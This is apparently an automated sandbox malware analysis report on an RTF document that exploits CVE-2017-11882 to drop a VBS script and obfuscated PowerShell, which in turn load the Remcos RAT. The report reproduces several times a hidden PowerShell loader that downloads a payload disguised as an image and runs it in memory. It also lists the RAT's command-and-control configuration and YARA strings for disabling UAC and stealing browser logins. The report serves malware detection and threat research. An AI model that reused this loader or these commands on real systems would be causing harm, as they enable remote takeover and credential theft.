Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf

Overview

General Information

Sample name: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
Analysis ID: 1520534
MD5: 5d0660bf632fd0fa66bc638775eb4b88
SHA1: f55a1c4a78252cc765f1747c321d0812ae0f9f38
SHA256: c3c93d712f93c4abe746760e31182f3cd5dfea00cb99176322f843ac20096697
Tags: rtf
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3336 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x12cc:$obj2: \objdata
  • 0x12b2:$obj3: \objupdate
  • 0x128f:$obj4: \objemb

Source: C:\Users\user\Desktop\~WRD0000.tmp
Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2
Description: detects CVE-2017-8759 weaponized RTF documents.
Author: ditekSHen
Strings:
  • 0xabd5:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xac1f:$ole2: d0cf11e0a1b11ae1
  • 0x5699:$obj2: \objdata
  • 0x5677:$obj4: \objemb
Source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_Keylogger_Generic
Description: Yara detected Keylogger Generic
Author: Joe Security

Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_UACBypassusingCMSTP
Description: Yara detected UAC Bypass using CMSTP
Author: Joe Security

Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: Windows_Trojan_Remcos_b296e965
Description: unknown
Author: unknown
Strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i

Source: 9.2.RegAsm.exe.400000.0.unpack
Rule: JoeSecurity_Keylogger_Generic
Description: Yara detected Keylogger Generic
Author: Joe Security

Source: 9.2.RegAsm.exe.400000.0.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 9.2.RegAsm.exe.400000.0.unpack
Rule: JoeSecurity_UACBypassusingCMSTP
Description: Yara detected UAC Bypass using CMSTP
Author: Joe Security

Source: 9.2.RegAsm.exe.400000.0.unpack
Rule: Windows_Trojan_Remcos_b296e965
Description: unknown
Author: unknown
Strings:
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i

Source: 9.2.RegAsm.exe.400000.0.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 185.235.137.223, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3420, TargetFilename: C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted]
Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 185.235.137.223, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted]
                Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3420, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , ProcessId: 3580, ProcessName: wscript.exe
                Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3420, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , ProcessId: 3580, ProcessName: wscript.exe
                Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = [obfuscated Base64 string omitted]
                Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = [obfuscated Base64 string omitted]
                Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = [obfuscated Base64 string omitted]
                Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3420, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , ProcessId: 3580, ProcessName: wscript.exe
                Source: Registry Key set, Author: frack113, Data: Details: [binary value omitted], EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3420, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = [obfuscated Base64 string omitted]
                Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3628, TargetFilename: C:\Users\user\AppData\Local\Temp\meo10pqm.2ns.ps1

                Data Obfuscation

                Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = [obfuscated Base64 string omitted]

                Stealing of Sensitive Information

                Source: Registry Key set, Author: Joe Security, Data: Details: [binary value omitted], EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3844, TargetObject: HKEY_CURRENT_USER\Software\Rmc-GT4655\exepath
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-09-27T14:00:19.277462+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 185.235.137.223 | 80 | 192.168.2.22 | 49163 | TCP
                2024-09-27T14:00:19.277462+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 185.235.137.223 | 80 | 192.168.2.22 | 49163 | TCP
                2024-09-27T14:00:24.455225+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49164 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:36.906135+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49165 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:43.549242+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49166 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:45.972234+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49167 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:48.920848+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49168 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:51.366389+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49169 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:54.908881+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49170 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:57.365279+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49171 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:59.806039+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49172 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:02.280898+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49173 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:04.729676+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:07.191649+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49175 | 192.3.101.29 | 14645 | TCP
